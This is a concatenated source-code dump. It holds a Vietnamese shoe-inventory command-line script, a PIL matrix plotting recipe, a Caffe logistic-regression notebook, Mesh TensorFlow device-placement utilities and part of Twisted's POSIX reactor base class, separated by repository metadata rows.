    print("Nhập size giày: ")
    product['Size'] = input()
    list_product.list_product.append(product)
    # "Add another?" -- answering y/Y recurses; any other answer returns.
    answer = input("Bạn có muốn nhập tiếp không? Y/N ")
    if answer == "y" or answer == "Y":
        AddProduct()
# Look up a product by its ID.
def FindProductDuplicate(Id):
    """Return ``[index, product_dict]`` for the product whose 'Id' equals
    *Id*, or ``False`` when no such product exists."""
    for index, product in enumerate(list_product.list_product):
        if product['Id'] == Id:
            return [index, product]
    return False
# List every product on stdout, one field per line.
def ShowAllProduct():
    """Print all products stored in data.list_product."""
    print("*** HIỂN THỊ TẤT CẢ SẢN PHẨM ***")
    products = list_product.list_product
    if len(products) <= 0:
        print("Chưa có sản phẩm nào để hiển thị! ".upper())
    for entry in products:
        print("ID: ", entry['Id'])
        print("Mã sản phẩm: ", entry['Product_code'])
        print("Tên sản phẩm: ", entry['Product_name'])
        print("Thương hiệu: ", entry['Brand'])
        print("Giá: ", entry['Price'])
        print("Năm xuất bản: ", entry['Year'])
        print("Số lượng: ", entry['Quantity'])
        print("Size giày: ", entry['Size'])
        print("________________________________")
# Interactively edit one field of a product chosen by ID.
def UpdateProduct():
    # NOTE(review): the field-updater helpers are defined INSIDE the while
    # loop, after the dispatch that calls them. This only works because the
    # first iteration (action == 0) skips the dispatch and reaches the
    # helper definitions before prompting -- the statement order is
    # load-bearing, so do not reorder.
    print("*** CẬP NHẬT THÔNG TIN SẢN PHẨM ***")
    print("Nhập ID sản phẩm cần sửa")
    Id = int(input())
    product = FindProductDuplicate(Id)
    if product == False:
        print("Không tìm thấy sản phẩm ID = ", Id)
    else:
        print("""Bạn muốn cập nhật mục nào ? :
        0. Thoát.
        1. Tên sản phẩm.
        2. Thương hiệu sản phẩm.
        3. Giá sản phẩm
        4. Size giày.
        5. Số lượng.
        6. Năm xuất bản. """)
        action = 0
        # Loops until the user enters 0 (break below) or a negative number.
        while action >= 0:
            if action == 1:
                UpdateProductName()
            elif action == 2:
                UpdateProductBrand()
            elif action == 3:
                UpdateProductPrice()
            elif action == 4:
                UpdateProductSize()
            elif action == 5:
                UpdateProductQuatity()
            elif action == 6:
                UpdateProductYear()
            def UpdateProductName():
                print("Nhập tên sản phẩm")
                name_product = input()
                # product[1] is the dict stored in the list, so this
                # in-place mutation already persists.
                product[1]['Product_name'] = name_product
            def UpdateProductBrand():
                print("Nhập thương hiệu của sản phẩm")
                name_product = input()
                product[1]['Brand'] = name_product
            def UpdateProductPrice():
                print("Nhập giá mới của sản phẩm")
                name_product = float(input())
                product[1]['Price'] = name_product
            def UpdateProductSize():
                print("Nhập size của sản phẩm")
                name_product = input()
                product[1]['Size'] = name_product
            def UpdateProductYear():
                print("Nhập năm sản xuất của sản phẩm")
                name_product = int(input())
                product[1]['Year'] = name_product
                # Redundant: product[1] is already the object at this index.
                list_product.list_product[product[0]] = product[1]
            def UpdateProductQuatity():
                print("Nhập số lượng sản phẩm")
                name_product = int(input())
                product[1]['Quantity'] = name_product
                list_product.list_product[product[0]] = product[1]
            action = int(input("Bạn chọn mục cập nhật nào? "))
            if action == 0:
                print("Không cập nhật mục nào")
                break
# Xóa sản phẩm
def DeleteProduct():
    """Prompt for a product Id and remove the matching product, if any."""
    print("*** XÓA SẢN PHẨM ***")
    print("Nhập ID sản phẩm cần xóa:")
    target_id = int(input())
    found = FindProductDuplicate(target_id)
    if found == False:
        print("Không tìm thấy sản phẩm muốn xóa!")
    else:
        # found is [index, product_dict]; remove the dict itself.
        list_product.list_product.remove(found[1])
        print("Xóa sản phẩm thành công!")
# Tìm kiếm sản phẩm
def FindProductByName():
    """Prompt for a name/brand fragment and print every matching product.

    Matching is case-insensitive: a product is printed when the entered
    text occurs in its 'Product_name' or its 'Brand'.

    Fixes vs. the original: removed a stray token (`lí`) that raised
    NameError, removed a debug print that indexed the product *list* with a
    string key (TypeError), performed the match per product instead of on
    the whole list, and un-inverted the substring test (query in field,
    not field in query).
    """
    print("*** TÌM KIẾM SẢN PHẨM ***")
    NameProduct = str(
        input("Nhập tên sản phẩm hoặc tên thương hiệu bạn muốn tìm kiếm: ")).upper()
    found_any = False
    for item in list_product.list_product:
        # Case-insensitive substring match on product name or brand.
        if NameProduct in item['Product_name'].upper() or NameProduct in item['Brand'].upper():
            found_any = True
            print("ID: ", item['Id'])
            print("Mã sản phẩm: ", item['Product_code'])
            print("Tên sản phẩm: ", item['Product_name'])
            print("Thương hiệu: ", item['Brand'])
            print("Giá: ", item['Price'])
            print("Năm xuất bản: ", item['Year'])
            print("Số lượng: ", item['Quantity'])
            print("Size giày: ", item['Size'])
            print("________________________________")
    if not found_any:
        print("Không tìm thấy sản phẩm này @@".upper())
| [
"phanthituyngoc1995@gmail.com"
] | phanthituyngoc1995@gmail.com |
b89b38a5777080f39b5b0af78beb817fc594e3fe | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/390208_Matlablike_spy_pcolor/recipe-390208.py | af0402c8845b6bd612d208af863b90832966c331 | [
"MIT",
"Python-2.0"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 3,546 | py | def spy_matrix_pil(A,fname='tmp.png',cutoff=0.1,do_outline=0,
height=300,width=300):
"""\
Use a matlab-like 'spy' function to display the large elements
of a matrix using the Python Imaging Library.
Arguments:
A Input Numpy matrix
fname Output filename to which to dump the graphics (default 'tmp.png')
cutoff Threshold value for printing an element (default 0.1)
do_outline Whether or not to print an outline around the block (default 0)
height The height of the image (default 300)
width The width of the image (default 300)
Example:
>>> from Numeric import identity,Float
>>> a = identity(10,Float)
>>> spy_matrix_pil(a)
"""
import Image,ImageDraw
img = Image.new("RGB",(width,height),(255,255,255))
draw = ImageDraw.Draw(img)
n,m = A.shape
if n>width or m>height:
raise "Rectangle too big %d %d %d %d" % (n,m,width,height)
for i in range(n):
xmin = width*i/float(n)
xmax = width*(i+1)/float(n)
for j in range(m):
ymin = height*j/float(m)
ymax = height*(j+1)/float(m)
if abs(A[i,j]) > cutoff:
if do_outline:
draw.rectangle((xmin,ymin,xmax,ymax),fill=(0,0,255),
outline=(0,0,0))
else:
draw.rectangle((xmin,ymin,xmax,ymax),fill=(0,0,255))
img.save(fname)
return
def pcolor_matrix_pil(A,fname='tmp.png',do_outline=0,
                      height=300,width=300):
    """Matlab-like 'pcolor': render a matrix as colored cells with PIL.

    Arguments:
    A           Input 2-D matrix (anything with a .shape of (n, m))
    fname       Output filename for the image (default 'tmp.png')
    do_outline  Whether to draw a black outline around each block (default 0)
    height      Image height in pixels (default 300)
    width       Image width in pixels (default 300)

    Example:
    >>> from Numeric import identity,Float
    >>> a = identity(10,Float)
    >>> pcolor_matrix_pil(a)
    """
    import Image,ImageDraw
    img = Image.new("RGB",(width,height),(255,255,255))
    draw = ImageDraw.Draw(img)
    # Global min/max used to normalise the color ramp.
    # NOTE(review): min(min(A)) relies on Numeric's behaviour when comparing
    # rows; assumes it yields the global extrema — TODO confirm for the
    # array type actually passed in.
    mina = min(min(A))
    maxa = max(max(A))
    n,m = A.shape
    if n>width or m>height:
        # The original raised a bare string, which is itself a TypeError at
        # raise time; raise a real exception carrying the intended message.
        raise ValueError("Rectangle too big %d %d %d %d" % (n,m,width,height))
    for i in range(n):
        xmin = width*i/float(n)
        xmax = width*(i+1)/float(n)
        for j in range(m):
            ymin = height*j/float(m)
            ymax = height*(j+1)/float(m)
            # Map the element value onto the shared color ramp.
            color = get_color(A[i,j],mina,maxa)
            if do_outline:
                draw.rectangle((xmin,ymin,xmax,ymax),fill=color,
                               outline=(0,0,0))
            else:
                draw.rectangle((xmin,ymin,xmax,ymax),fill=color)
    img.save(fname)
    return
def get_color(a,cmin,cmax):
    """Map a value in [cmin, cmax] onto a short '#rgb' hex color string.

    The value is normalised to [0, 1] (the midpoint 0.5 is used when
    cmax == cmin) and converted through a blue -> green -> red ramp, one
    hex digit per channel. Based on recipe 9.10 from the Python Cookbook.
    """
    import math

    span = cmax - cmin
    if span == 0:
        frac = 0.5  # degenerate range: every value maps to the midpoint
    else:
        frac = float(a - cmin) / span

    def clamp01(v):
        return min(max(v, 0.0), 1.0)

    red = clamp01(4 * (frac - 0.25))
    green = clamp01(4 * math.fabs(frac - 0.5) - 1.0)
    blue = clamp01(4 * (0.75 - frac))
    return '#%1x%1x%1x' % (int(15 * red), int(15 * green), int(15 * blue))
# Demo: build a 10x10 float identity matrix with Numeric (the pre-NumPy
# array package this recipe targets) and render it with both helpers.
from Numeric import identity,Float
a = identity(10,Float)
spy_matrix_pil(a)
pcolor_matrix_pil(a,'tmp2.png')
| [
"betty@qburst.com"
] | betty@qburst.com |
9166bba17e84a36d0e3627b66fc47d717a04d0ec | d3a8892f7e8a9d7767b3d797b0274004bf53e109 | /caffe/examples/notebook/original/brewing-logreg.py | 288d437ed475c854b70fc17a5e97ba4a9b78cde9 | [
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | QI1002/machinelearning | 27d3217430c3440fce81f42e70aa88762dd9529c | 8daa4a54a5010ec702cb56b56f6373f5f09c891b | refs/heads/master | 2020-05-23T12:44:09.767397 | 2019-05-15T12:36:06 | 2019-05-15T12:36:06 | 186,762,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,606 | py | # based on Ipython Notebook script in https://github.com/QI1002/caffe/blob/master/examples/brewing-logreg.ipynb
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
import os
os.chdir('..')
import sys
sys.path.insert(0, './python')
import caffe
import os
import h5py
import shutil
import tempfile
import sklearn
import sklearn.datasets
import sklearn.linear_model
import pandas as pd
X, y = sklearn.datasets.make_classification(
n_samples=10000, n_features=4, n_redundant=0, n_informative=2,
n_clusters_per_class=2, hypercube=False, random_state=0
)
# Split into train and test
X, Xt, y, yt = sklearn.cross_validation.train_test_split(X, y)
# Visualize sample of the data
ind = np.random.permutation(X.shape[0])[:1000]
df = pd.DataFrame(X[ind])
_ = pd.scatter_matrix(df, figsize=(9, 9), diagonal='kde', marker='o', s=40, alpha=.4, c=y[ind])
%%timeit
# Train and test the scikit-learn SGD logistic regression.
clf = sklearn.linear_model.SGDClassifier(
loss='log', n_iter=1000, penalty='l2', alpha=5e-4, class_weight='auto')
clf.fit(X, y)
yt_pred = clf.predict(Xt)
print('Accuracy: {:.3f}'.format(sklearn.metrics.accuracy_score(yt, yt_pred)))
# Write out the data to HDF5 files in a temp directory.
# This file is assumed to be caffe_root/examples/hdf5_classification.ipynb
dirname = os.path.abspath('./examples/hdf5_classification/data')
if not os.path.exists(dirname):
os.makedirs(dirname)
train_filename = os.path.join(dirname, 'train.h5')
test_filename = os.path.join(dirname, 'test.h5')
# HDF5DataLayer source should be a file containing a list of HDF5 filenames.
# To show this off, we'll list the same data file twice.
with h5py.File(train_filename, 'w') as f:
f['data'] = X
f['label'] = y.astype(np.float32)
with open(os.path.join(dirname, 'train.txt'), 'w') as f:
f.write(train_filename + '\n')
f.write(train_filename + '\n')
# HDF5 is pretty efficient, but can be further compressed.
comp_kwargs = {'compression': 'gzip', 'compression_opts': 1}
with h5py.File(test_filename, 'w') as f:
f.create_dataset('data', data=Xt, **comp_kwargs)
f.create_dataset('label', data=yt.astype(np.float32), **comp_kwargs)
with open(os.path.join(dirname, 'test.txt'), 'w') as f:
f.write(test_filename + '\n')
from caffe import layers as L
from caffe import params as P
def logreg(hdf5, batch_size):
    """Build a logistic-regression net spec.

    HDF5 data layer -> single inner product (2 outputs) -> accuracy and
    2-class softmax loss. Returns the NetParameter protobuf.
    """
    spec = caffe.NetSpec()
    spec.data, spec.label = L.HDF5Data(source=hdf5, batch_size=batch_size, ntop=2)
    spec.ip1 = L.InnerProduct(spec.data, num_output=2,
                              weight_filler=dict(type='xavier'))
    spec.accuracy = L.Accuracy(spec.ip1, spec.label)
    spec.loss = L.SoftmaxWithLoss(spec.ip1, spec.label)
    return spec.to_proto()
train_net_path = 'examples/hdf5_classification/logreg_auto_train.prototxt'
with open(train_net_path, 'w') as f:
f.write(str(logreg('examples/hdf5_classification/data/train.txt', 10)))
test_net_path = 'examples/hdf5_classification/logreg_auto_test.prototxt'
with open(test_net_path, 'w') as f:
f.write(str(logreg('examples/hdf5_classification/data/test.txt', 10)))
from caffe.proto import caffe_pb2
def solver(train_net_path, test_net_path):
    """Return a SolverParameter for SGD training of the given nets.

    Uses a 'step' learning-rate schedule, momentum + L2 weight decay, and
    runs on the CPU (for fair benchmarking against scikit-learn).
    """
    params = caffe_pb2.SolverParameter()

    # Locations of the train and test network definitions.
    params.train_net = train_net_path
    params.test_net.append(test_net_path)

    params.test_interval = 1000   # test after every 1000 training iterations
    params.test_iter.append(250)  # run 250 test "batches" per evaluation
    params.max_iter = 10000       # total number of net updates (iterations)

    # SGD: initial learning rate, then multiplied by `gamma` every
    # `stepsize` iterations (the 'step' policy).
    params.base_lr = 0.01
    params.lr_policy = 'step'
    params.gamma = 0.1
    params.stepsize = 5000

    # Momentum averages the current gradient with previous ones for more
    # stable learning; weight decay (L2) regularises against overfitting.
    params.momentum = 0.9
    params.weight_decay = 5e-4

    # Report training loss and accuracy every 1000 iterations.
    params.display = 1000

    # Snapshot the trained net to disk; with snapshot == max_iter this
    # happens just once, at the end of training.
    params.snapshot = 10000
    params.snapshot_prefix = 'examples/hdf5_classification/data/train'

    params.solver_mode = caffe_pb2.SolverParameter.CPU
    return params
solver_path = 'examples/hdf5_classification/logreg_solver.prototxt'
with open(solver_path, 'w') as f:
f.write(str(solver(train_net_path, test_net_path)))
%%timeit
caffe.set_mode_cpu()
solver = caffe.get_solver(solver_path)
solver.solve()
accuracy = 0
batch_size = solver.test_nets[0].blobs['data'].num
test_iters = int(len(Xt) / batch_size)
for i in range(test_iters):
solver.test_nets[0].forward()
accuracy += solver.test_nets[0].blobs['accuracy'].data
accuracy /= test_iters
print("Accuracy: {:.3f}".format(accuracy))
!./build/tools/caffe train -solver examples/hdf5_classification/logreg_solver.prototxt
from caffe import layers as L
from caffe import params as P
def nonlinear_net(hdf5, batch_size):
    """Build a two-layer (one hidden non-linearity) net spec.

    HDF5 data -> 40-unit inner product -> in-place ReLU -> 2-output inner
    product, with the same accuracy and softmax loss as logreg. Returns
    the NetParameter protobuf.
    """
    spec = caffe.NetSpec()
    spec.data, spec.label = L.HDF5Data(source=hdf5, batch_size=batch_size, ntop=2)
    # Hidden layer of dimension 40, transformed by a ReLU non-linearity.
    spec.ip1 = L.InnerProduct(spec.data, num_output=40,
                              weight_filler=dict(type='xavier'))
    spec.relu1 = L.ReLU(spec.ip1, in_place=True)
    # Score the (now non-linear) features.
    spec.ip2 = L.InnerProduct(spec.ip1, num_output=2,
                              weight_filler=dict(type='xavier'))
    spec.accuracy = L.Accuracy(spec.ip2, spec.label)
    spec.loss = L.SoftmaxWithLoss(spec.ip2, spec.label)
    return spec.to_proto()
train_net_path = 'examples/hdf5_classification/nonlinear_auto_train.prototxt'
with open(train_net_path, 'w') as f:
f.write(str(nonlinear_net('examples/hdf5_classification/data/train.txt', 10)))
test_net_path = 'examples/hdf5_classification/nonlinear_auto_test.prototxt'
with open(test_net_path, 'w') as f:
f.write(str(nonlinear_net('examples/hdf5_classification/data/test.txt', 10)))
solver_path = 'examples/hdf5_classification/nonlinear_logreg_solver.prototxt'
with open(solver_path, 'w') as f:
f.write(str(solver(train_net_path, test_net_path)))
%%timeit
caffe.set_mode_cpu()
solver = caffe.get_solver(solver_path)
solver.solve()
accuracy = 0
batch_size = solver.test_nets[0].blobs['data'].num
test_iters = int(len(Xt) / batch_size)
for i in range(test_iters):
solver.test_nets[0].forward()
accuracy += solver.test_nets[0].blobs['accuracy'].data
accuracy /= test_iters
print("Accuracy: {:.3f}".format(accuracy))
!./build/tools/caffe train -solver examples/hdf5_classification/nonlinear_logreg_solver.prototxt
# Clean up (comment this out if you want to examine the hdf5_classification/data directory).
shutil.rmtree(dirname)
| [
"alanchang544@gmail.com"
] | alanchang544@gmail.com |
832d35a685c7bd0a682533fa880372e0d17ad7b8 | 12ddeca149e1a95aa404d494a8856536c3a7022b | /mesh_tensorflow/utils.py | 8a4fc9aa67c1d2f8b7d8c4e971a75021fe2c75b3 | [
"Apache-2.0"
] | permissive | brettkoonce/mesh | bbe1c2c08aaa4ce50bd91497c122f1a9f252fb27 | 07417c92a061978f5b6ec10af5ebb6aa48de1d7e | refs/heads/master | 2020-04-08T10:29:55.910960 | 2018-11-25T02:31:42 | 2018-11-25T02:32:56 | 159,271,264 | 0 | 0 | null | 2018-11-27T03:35:58 | 2018-11-27T03:35:58 | null | UTF-8 | Python | false | false | 2,209 | py | # coding=utf-8
# Copyright 2018 The Mesh TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities for Mesh TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import heapq
import tensorflow as tf
from tensorflow.python.framework import ops
@contextlib.contextmanager
def outside_all_rewrites():
with ops.control_dependencies(None):
yield
class BalancedVariablePlacer(object):
"""Place the variable on different device and blance the memory usage."""
def __init__(self, devices, init_usage=None):
init_usage = init_usage if init_usage else [0] * len(devices)
assert len(devices) == len(init_usage)
self._mem_device_heap = list(zip(init_usage, devices))
heapq.heapify(self._mem_device_heap)
self._last_device = devices[0]
def device_function(self, var):
"""Choose a device for the input variable.
Args:
var: an Variable.
Returns:
The device for placing the var.
"""
if var.type not in ('Variable', 'VariableV2', 'VarHandleOp'):
tf.logging.debug('Place {} on last device: {}.'.format(
var.name, self._last_device))
return self._last_device
shape = tf.TensorShape(var.get_attr('shape'))
assert shape.num_elements() is not None
size = tf.DType(var.get_attr('dtype')).size
mem, device = heapq.heappop(self._mem_device_heap)
mem += shape.num_elements() * size
heapq.heappush(self._mem_device_heap, (mem, device))
tf.logging.debug('Place variable {} on {} and consumes {} Bytes.'.format(
var.name, device, mem))
self._last_device = device
return device
| [
"copybara-piper@google.com"
] | copybara-piper@google.com |
39b028afb5cae996620b91317e1c4b079eacc147 | 134ff3c0719d4c0022eb0fb7c859bdbff5ca34b2 | /desktop/core/ext-py/Twisted/twisted/internet/posixbase.py | 14e37327623f2c803659a30ddbe5b454c61f25ed | [
"MIT",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | civascu/hue | 22637f13a4cfc557716557661523131b6ac16da4 | 82f2de44789ff5a981ed725175bae7944832d1e9 | refs/heads/master | 2020-03-31T01:50:39.449966 | 2010-07-21T01:05:50 | 2010-07-21T01:07:15 | 788,284 | 0 | 0 | Apache-2.0 | 2019-02-04T07:03:12 | 2010-07-21T07:34:27 | Python | UTF-8 | Python | false | false | 14,189 | py | # -*- test-case-name: twisted.test.test_internet -*-
#
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Posix reactor base class
Maintainer: Itamar Shtull-Trauring
"""
import warnings
import socket
import errno
import os
from zope.interface import implements, classImplements
from twisted.internet.interfaces import IReactorUNIX, IReactorUNIXDatagram
from twisted.internet.interfaces import IReactorTCP, IReactorUDP, IReactorSSL, IReactorArbitrary
from twisted.internet.interfaces import IReactorProcess, IReactorMulticast
from twisted.internet.interfaces import IHalfCloseableDescriptor
from twisted.internet import error
from twisted.internet import tcp, udp
from twisted.python import log, failure, util
from twisted.persisted import styles
from twisted.python.runtime import platformType, platform
from twisted.internet.base import ReactorBase, _SignalReactorMixin
try:
from twisted.internet import ssl
sslEnabled = True
except ImportError:
sslEnabled = False
try:
from twisted.internet import unix
unixEnabled = True
except ImportError:
unixEnabled = False
processEnabled = False
if platformType == 'posix':
from twisted.internet import fdesc
import process
processEnabled = True
if platform.isWindows():
try:
import win32process
processEnabled = True
except ImportError:
win32process = None
class _Win32Waker(log.Logger, styles.Ephemeral):
    """I am a workaround for the lack of pipes on win32.
    I am a pair of connected sockets which can wake up the main loop
    from another thread.
    """
    disconnected = 0
    def __init__(self, reactor):
        """Initialize.
        """
        self.reactor = reactor
        # Following select_trigger (from asyncore)'s example;
        # hand-build a connected localhost socket pair: listen, connect,
        # accept, then keep the accepted side as the read end.
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Option 1 at level IPPROTO_TCP — presumably TCP_NODELAY, so the
        # single wakeup byte is not held back by Nagle; verify against
        # winsock docs.
        client.setsockopt(socket.IPPROTO_TCP, 1, 1)
        server.bind(('127.0.0.1', 0))
        server.listen(1)
        client.connect(server.getsockname())
        reader, clientaddr = server.accept()
        # Both ends are non-blocking so neither the reactor thread nor a
        # waking thread can hang on socket I/O.
        client.setblocking(0)
        reader.setblocking(0)
        self.r = reader
        self.w = client
        self.fileno = self.r.fileno
    def wakeUp(self):
        """Send a byte to my connection.
        """
        try:
            util.untilConcludes(self.w.send, 'x')
        except socket.error, (err, msg):
            # WSAEWOULDBLOCK: the send buffer is full, which means a wakeup
            # is already pending — safe to ignore.
            if err != errno.WSAEWOULDBLOCK:
                raise
    def doRead(self):
        """Read some data from my connection.
        """
        # Drain whatever wakeup bytes accumulated; the content is irrelevant.
        try:
            self.r.recv(8192)
        except socket.error:
            pass
    def connectionLost(self, reason):
        # Close both sockets and detach this waker from the reactor.
        self.r.close()
        self.w.close()
        self.reactor.waker = None
class _UnixWaker(log.Logger, styles.Ephemeral):
    """This class provides a simple interface to wake up the event loop.
    This is used by threads or signals to wake up the event loop.
    """
    disconnected = 0
    # Read (i) and write (o) file descriptors of the self-pipe.
    i = None
    o = None
    def __init__(self, reactor):
        """Initialize.
        """
        self.reactor = reactor
        # The self-pipe trick: the read end is watched by the reactor,
        # the write end is poked by wakeUp().
        self.i, self.o = os.pipe()
        # Non-blocking on both ends so neither side can ever hang.
        fdesc.setNonBlocking(self.i)
        fdesc.setNonBlocking(self.o)
        self.fileno = lambda: self.i
    def doRead(self):
        """Read some bytes from the pipe.
        """
        # Drain pending wakeup bytes; the data itself is discarded.
        fdesc.readFromFD(self.fileno(), lambda data: None)
    def wakeUp(self):
        """Write one byte to the pipe, and flush it.
        """
        # We don't use fdesc.writeToFD since we need to distinguish
        # between EINTR (try again) and EAGAIN (do nothing).
        if self.o is not None:
            try:
                util.untilConcludes(os.write, self.o, 'x')
            except OSError, e:
                # EAGAIN: the pipe is full, so a wakeup is already pending.
                if e.errno != errno.EAGAIN:
                    raise
    def connectionLost(self, reason):
        """Close both ends of my pipe.
        """
        # May be called more than once: bail out if the descriptors were
        # already deleted below.
        if not hasattr(self, "o"):
            return
        for fd in self.i, self.o:
            try:
                os.close(fd)
            except IOError:
                pass
        del self.i, self.o
        self.reactor.waker = None
# Pick the concrete waker implementation for this platform: a real pipe on
# POSIX, a localhost socket pair on Windows (which lacks select()able pipes).
if platformType == 'posix':
    _Waker = _UnixWaker
elif platformType == 'win32':
    _Waker = _Win32Waker
class PosixReactorBase(_SignalReactorMixin, ReactorBase):
    """
    A basis for reactors that use file descriptors.
    """
    implements(IReactorArbitrary, IReactorTCP, IReactorUDP, IReactorMulticast)

    def __init__(self):
        ReactorBase.__init__(self)
        if self.usingThreads or platformType == "posix":
            self.installWaker()

    def _disconnectSelectable(self, selectable, why, isRead, faildict={
        error.ConnectionDone: failure.Failure(error.ConnectionDone()),
        error.ConnectionLost: failure.Failure(error.ConnectionLost())
        }):
        """
        Utility function for disconnecting a selectable.
        Supports half-close notification, isRead should be boolean indicating
        whether error resulted from doRead().
        """
        self.removeReader(selectable)
        f = faildict.get(why.__class__)
        if f:
            # A clean read-side close on a half-closeable descriptor only
            # closes the read direction; anything else tears the whole
            # connection down.
            if (isRead and why.__class__ == error.ConnectionDone
                and IHalfCloseableDescriptor.providedBy(selectable)):
                selectable.readConnectionLost(f)
            else:
                self.removeWriter(selectable)
                selectable.connectionLost(f)
        else:
            self.removeWriter(selectable)
            selectable.connectionLost(failure.Failure(why))

    def installWaker(self):
        """
        Install a `waker' to allow threads and signals to wake up the IO thread.
        We use the self-pipe trick (http://cr.yp.to/docs/selfpipe.html) to wake
        the reactor. On Windows we use a pair of sockets.
        """
        if not self.waker:
            self.waker = _Waker(self)
            self.addReader(self.waker)

    # IReactorProcess

    def spawnProcess(self, processProtocol, executable, args=(),
                     env={}, path=None,
                     uid=None, gid=None, usePTY=0, childFDs=None):
        """
        Spawn a child process. On POSIX this uses PTYProcess or Process
        depending on usePTY; on Windows it requires pywin32 and does not
        support uid/gid, usePTY, or custom childFDs.
        """
        args, env = self._checkProcessArgs(args, env)
        if platformType == 'posix':
            if usePTY:
                if childFDs is not None:
                    raise ValueError("Using childFDs is not supported with usePTY=True.")
                return process.PTYProcess(self, executable, args, env, path,
                                          processProtocol, uid, gid, usePTY)
            else:
                return process.Process(self, executable, args, env, path,
                                       processProtocol, uid, gid, childFDs)
        elif platformType == "win32":
            if uid is not None or gid is not None:
                raise ValueError("The uid and gid parameters are not supported on Windows.")
            if usePTY:
                raise ValueError("The usePTY parameter is not supported on Windows.")
            if childFDs:
                raise ValueError("Customizing childFDs is not supported on Windows.")
            if win32process:
                from twisted.internet._dumbwin32proc import Process
                return Process(self, processProtocol, executable, args, env, path)
            else:
                # raise-with-instance instead of the old comma form (works on
                # both the py2 versions this file targets).
                raise NotImplementedError("spawnProcess not available since pywin32 is not installed.")
        else:
            raise NotImplementedError("spawnProcess only available on Windows or POSIX.")

    # IReactorUDP

    def listenUDP(self, port, protocol, interface='', maxPacketSize=8192):
        """Connects a given L{DatagramProtocol} to the given numeric UDP port.
        @returns: object conforming to L{IListeningPort}.
        """
        p = udp.Port(port, protocol, interface, maxPacketSize, self)
        p.startListening()
        return p

    def connectUDP(self, remotehost, remoteport, protocol, localport=0,
                  interface='', maxPacketSize=8192):
        """DEPRECATED.
        Connects a L{ConnectedDatagramProtocol} instance to a UDP port.
        """
        warnings.warn("use listenUDP and then transport.connect().", DeprecationWarning, stacklevel=2)
        p = udp.ConnectedPort((remotehost, remoteport), localport, protocol, interface, maxPacketSize, self)
        p.startListening()
        return p

    # IReactorMulticast

    def listenMulticast(self, port, protocol, interface='', maxPacketSize=8192, listenMultiple=False):
        """Connects a given DatagramProtocol to the given numeric UDP port.
        EXPERIMENTAL.
        @returns: object conforming to IListeningPort.
        """
        p = udp.MulticastPort(port, protocol, interface, maxPacketSize, self, listenMultiple)
        p.startListening()
        return p

    # IReactorUNIX

    def connectUNIX(self, address, factory, timeout=30, checkPID=0):
        """@see: twisted.internet.interfaces.IReactorUNIX.connectUNIX
        """
        assert unixEnabled, "UNIX support is not present"
        c = unix.Connector(address, factory, timeout, self, checkPID)
        c.connect()
        return c

    # Sentinel used to detect whether a caller explicitly passed `mode`.
    _unspecified = object()

    def _checkMode(self, name, mode):
        """
        Check C{mode} to see if a value was specified for it and emit a
        deprecation warning if so. Return the default value if none was
        specified, otherwise return C{mode}.
        """
        if mode is not self._unspecified:
            warnings.warn(
                'The mode parameter of %(name)s will be removed. Do not pass '
                'a value for it. Set permissions on the containing directory '
                'before calling %(name)s, instead.' % dict(name=name),
                category=DeprecationWarning,
                stacklevel=3)
        else:
            mode = 0o666
        return mode

    def listenUNIX(self, address, factory, backlog=50, mode=_unspecified,
                   wantPID=0):
        """
        @see: twisted.internet.interfaces.IReactorUNIX.listenUNIX
        """
        assert unixEnabled, "UNIX support is not present"
        mode = self._checkMode('IReactorUNIX.listenUNIX', mode)
        p = unix.Port(address, factory, backlog, mode, self, wantPID)
        p.startListening()
        return p

    # IReactorUNIXDatagram

    def listenUNIXDatagram(self, address, protocol, maxPacketSize=8192,
                           mode=_unspecified):
        """
        Connects a given L{DatagramProtocol} to the given path.
        EXPERIMENTAL.
        @returns: object conforming to L{IListeningPort}.
        """
        assert unixEnabled, "UNIX support is not present"
        mode = self._checkMode('IReactorUNIXDatagram.listenUNIXDatagram', mode)
        p = unix.DatagramPort(address, protocol, maxPacketSize, mode, self)
        p.startListening()
        return p

    def connectUNIXDatagram(self, address, protocol, maxPacketSize=8192,
                            mode=_unspecified, bindAddress=None):
        """
        Connects a L{ConnectedDatagramProtocol} instance to a path.
        EXPERIMENTAL.
        """
        assert unixEnabled, "UNIX support is not present"
        # BUGFIX: the checked/defaulted mode was previously assigned to a
        # typo name ("mopde"), so the _unspecified sentinel could be passed
        # straight through to ConnectedDatagramPort as the file mode.
        mode = self._checkMode('IReactorUNIXDatagram.connectUNIXDatagram', mode)
        p = unix.ConnectedDatagramPort(address, protocol, maxPacketSize, mode, bindAddress, self)
        p.startListening()
        return p

    # IReactorTCP

    def listenTCP(self, port, factory, backlog=50, interface=''):
        """@see: twisted.internet.interfaces.IReactorTCP.listenTCP
        """
        p = tcp.Port(port, factory, backlog, interface, self)
        p.startListening()
        return p

    def connectTCP(self, host, port, factory, timeout=30, bindAddress=None):
        """@see: twisted.internet.interfaces.IReactorTCP.connectTCP
        """
        c = tcp.Connector(host, port, factory, timeout, bindAddress, self)
        c.connect()
        return c

    # IReactorSSL (sometimes, not implemented)

    def connectSSL(self, host, port, factory, contextFactory, timeout=30, bindAddress=None):
        """@see: twisted.internet.interfaces.IReactorSSL.connectSSL
        """
